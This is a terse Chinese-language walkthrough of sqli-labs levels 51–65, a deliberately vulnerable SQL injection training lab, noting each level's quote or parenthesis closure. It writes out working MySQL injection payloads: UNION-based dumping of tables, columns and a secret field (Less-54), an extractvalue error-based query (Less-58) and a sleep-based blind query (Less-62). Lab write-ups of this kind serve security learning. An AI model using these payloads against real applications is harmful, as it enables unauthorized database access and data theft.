sql-ilabs闯关51-65关——通关记录

sqli-labs闯关51-65——通关记录

Less-51

测试可得本关是单引号注入

和上题类似

Less-52

本题是盲注，没有报错信息，可以使用sqlmap，或者使用延时注入，不多说

Less-53

本题也和上面的题没区别

Less-54

这题可以知道库名就是challenges，因为限制了查询次数，所以这题不能用sqlmap

本题可以直接使用联合查询，且可以测出闭合方式为单引号，构造语句

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

接下来一套组合拳

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='9ntli72i5o' --+	#爆列

?id=-1' union select 1,group_concat(secret_0VFF),3 from challenges.9ntli72i5o --+	#爆字段

成功

Less-55

可以测试出，本题闭合方式为小括号，其余和上题类似，不再赘述

Less-56

本题基于单引号小括号

Less-57

本题基于双引号

Less-58

可以发现这一关没有返回数据库内容，因此无法使用union select，但是可以使用报错注入，使用的是同一个数据库，因此可以直接在前面的关卡获得表名

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘apipvq6e4j’),0x7e)) --+

Less-59

本题和上题类似，闭合方式为单引号

Less-60

和上题类似，闭合方式是双引号

Less-61

和上题类似，闭合方式是单引号两个小括号

Less-62

本题没有报错提示，就不能用报错注入，采用盲注

?id=1) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79 ,0,sleep(10))–+

Less-63——65

都是盲注，只是闭合方式不一样，不多说

终于做完了，要命